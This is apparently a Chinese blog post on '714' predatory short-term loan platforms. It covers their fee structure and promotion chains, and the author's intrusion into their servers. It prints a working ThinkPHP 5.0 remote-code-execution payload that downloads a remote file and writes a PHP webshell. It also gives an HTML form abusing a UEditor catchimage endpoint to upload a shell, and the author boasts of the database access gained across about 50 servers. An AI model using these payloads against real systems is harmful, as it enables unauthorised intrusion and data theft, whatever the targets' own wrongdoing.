我与714高炮平台那些不为人知的秘密
714高炮指那些期限为7天或14天的高利息网络贷款,其包含高额的“砍头息”及“逾期费用”。714高炮基本上90%都是以7天期为主。利息方面年化利率基本上都超过了1500%
说明
以借贷为业的民间借贷合同无效,意味着所有714、小高炮、借条等网络高利贷,合同都是无效的,借款人就算逾期,就算不还款,因为合同无效,放贷人也无法起诉到法院。这对遭遇网络高利贷暴力催收的人来说,无疑是一个福音:既然你爆我通讯录,我就是不还款,有本事你去告呗?反正法院也不支持你!
调查
经过长期的摸排经验累积主要有以下几个部分组成
1.直接
放款人 - 借贷人
公司放款 - 中间商 - 借贷人
2.间接
推广 - 贷超平台 - 714平台
代理商负责推广 - 每个新开客户(10-14)(14-18元)不等,据我所知,做代理的几乎每天都可以赚几千。至于数据的来源就有待考究了。
这其中还涉及到前期的审核,例如收集通讯录,实时记载短信记录,以及后期的催收。暴力催收是违法行为。
发现
此开发为TP5.0框架,直接进行POST写shell
POC:
?s=captcha&Fuck=copy("http://XX/1.txt","1.php")
POST:
_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=Fuck
每一个关键词组合利用所获得的URL总数也不一样具体要靠想象
分析:
`borrow_amount = 借款金额
borrow_days = 借款天数
borrow_rate = 利率
overdue_rate = 逾期利率
collection_rate = 催收服务费费率(借款金额x%催收天数)
verify_fee = 信息认证费
insurance_fee = 保险服务费
interest_fee = 借款利息
borrow_servcie_fee = 借款手续费
account_manage_fee = 账户管理费
truely_amount = 实际到账金额
total_fee = 服务总费用 `
例如:
借款2000元,扣除总费用600,剩余1400,如此高额的手续费。
另外还收集用户的个人隐私 例如短信记录以及通话记录,手机联系人。
现在来说下继714之后新的玩法
在前段时间,摸索高利贷平台.发现了某系统。
这是一套基于UI框架二开的后台管理程序,结合了商城,H5推广,管理,具体的源码之前在GITHUB找到了,未保存。
所见即所得,通过查询特征发现一群网站,所搜集的通讯录号码有千万,涉及百万借贷人。管理也是人才,有钱,阿里开了五十多台服务器。
说明
对比之前的714是直接收取手续费用,现在的714是通过手机评估,以及购买手机收取手续费用.举个例子,你需要借款,必须购买手机,手机为一千元,你需要支付400元的鉴定费用,才可以拿到1000元的借款,变相的还是付出了400的利息。其本质还是高利贷.
根据网上的漏洞利用
<form action="http://xx/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit" />
</form>
通过对SHELL的比对,我得到了以下所有的信息
以47.xxx.xx.xx开头管理员总计开了大概有50台服务器作为高利贷推广放贷。
相同的框架相同的数据库密码,简称真香。。
本文作者为lufei,转载请注明。